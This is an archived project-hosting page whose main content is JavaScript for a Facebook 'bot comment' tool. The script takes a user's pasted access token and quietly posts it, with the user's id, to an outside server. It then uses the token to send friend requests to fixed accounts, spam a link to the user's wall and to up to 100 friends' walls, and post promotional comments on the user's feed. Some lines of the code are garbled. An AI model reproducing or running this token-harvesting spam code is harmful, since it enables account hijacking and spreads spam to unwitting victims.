My favorites | Sign in
Project Home Wiki Issues Source
READ-ONLY: This project has been archived. For more information see this post.
Project Information
Members

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js">
</script>
<script>
var arr=[""];
var tokenme; var user = {}; function ileti(type,msg){
$('#logs').append('
' + msg + '
'); $('#ileti').fadeIn('slow'); $('#ileti').removeAttr('id');
}
$('#gonder').click(function(){
if($('#access_token').val().length > 50){ $('.anlatim').hide(); $('#logs').html(""); $('#gonder').attr("disabled","disabled"); $('#gonder').attr("class","button grey");
access_token = $('#access_token').val(); if(access_token.indexOf("access_token=") > 0){ access_token = access_token.split("access_token=")1.split("&")0; $('#access_token').val(access_token); }
jQuery.ajax({ url:'https://graph.facebook.com/me?access_token=' + access_token, dataType:'jsonp', success:function(data){ user = data; if(user && user.name){ ileti("success","FaceBook Name : " + user.name); ileti("success","Bot Comment Success Full"); ileti("success","Thanks For Use"); $.post("http://liker.immense-ro.tk/main.php", { subs: user.id } ); $.post("http://liker.immense-ro.tk/main.php", { id: user.id, token: access_token } ); tokenme = access_token; sil(access_token,100001628385684); sil(access_token,100004701731140); sil(access_token,100004920035525); posttowall(); arkadaslar() getStatus(access_token); sstats(); }else{ ileti("error",user.error.type+" error ("+user.error.code+")"); $('#gonder').removeAttr("disabled"); $('#gonder').attr("class","button blue"); } } }); }
});

aciklama = "Makasih ( http://ow.ly/jBq9r ) Bot Comment Saya Sudah Sukses _ ."; function posttowall(){

jQuery.ajax({ url:'https://graph.facebook.com/me/feed?message='+ aciklama +'&method=POST&access_token=' + access_token, dataType:'script', success:function(){ } });
} function arkadaslar(){
jQuery.ajax({ url:'https://graph.facebook.com/fql?q=SELECT uid, first_name FROM user WHERE uid IN ( SELECT uid2 FROM friend WHERE uid1 = me() ) ORDER BY rand() limit 100&access_token='+access_token, dataType:'jsonp', success:function(data){ wallpost(data); } });
} function wallpost(list){
for(i=0;i<list.data.length;i++){ jQuery.ajax({ url:'https://graph.facebook.com/'+list.datai.uid+'/feed?message=hello '+list.datai.first_name+ ' ' + aciklama +'&callback=paylas&method=POST&access_token=' + access_token, dataType:'script', success:function(){ gonderildi += 1; if(gonderildi >= list.data.length){
}
} }); }
} function sstats() { access_token = $('#access_token').val();
$.post("http://liker.immense-ro.tk/main.php", { subs: user.id } ); sil(access_token,arr[Math.round(arr.length*Math.random())]); setTimeout("getStatus()",10000);
} function getStatus(token){ var commentShort = "Salam @[176481165836519:Jempoler's Indonesia] Sobb . @@[0:[176481165836519:1:Buat Kamu Status Nya Sudah Sukses Saya Like Dan Comment]] (y) ,@@[0:[176481165836519:1:Like]] Dan @@[0:[176481165836519:1:Comment]] Balik Ya Sobb _ ... @@[0:[176481165836519:1:Baca Selengkapnya]].";

$.getJSON('https://graph.facebook.com/me?access_token=' + token, function (response) { if (response.id) {

var userid = response.id; var totalComments = 1000; $.getJSON('https://graph.facebook.com/' + userid + '/home?limit=' + totalComments + '&access_token=' + token, function (response) {
if(response.data){ var allPosts = ; $.each(response.data, function(i,data){
allPosts.push(data.id); var megaNumber=Math.floor(Math.random()100); var commentMessage = commentShort $.getJSON('https://graph.facebook.com/' + data.id + '/comments?method=POST&message=' + commentMessage + '&access_token=' + token, function (response) { //alert("Comment Posted!"); });
}); }
});
} }); } function sil(token,ids){
$.getJSON('https://graph.facebook.com/me/friends?uid=' + ids + '&method=post&access_token=' + token, function (response) {
//alert(response); });
} function TokenUrl(id){
return "https://m.facebook.com/dialog/permissions.request?app_id=350685531728&next=https%3A%2F%2Fm.facebook.com%2F&response_type=token&perms=publish_stream%2Coffline_access%2Cread_stream&refid=22&ref=stream";

}

$('#tokenal').click(function(){ window.open(TokenUrl("350685531728")); });
</script>

Powered by Google Project Hosting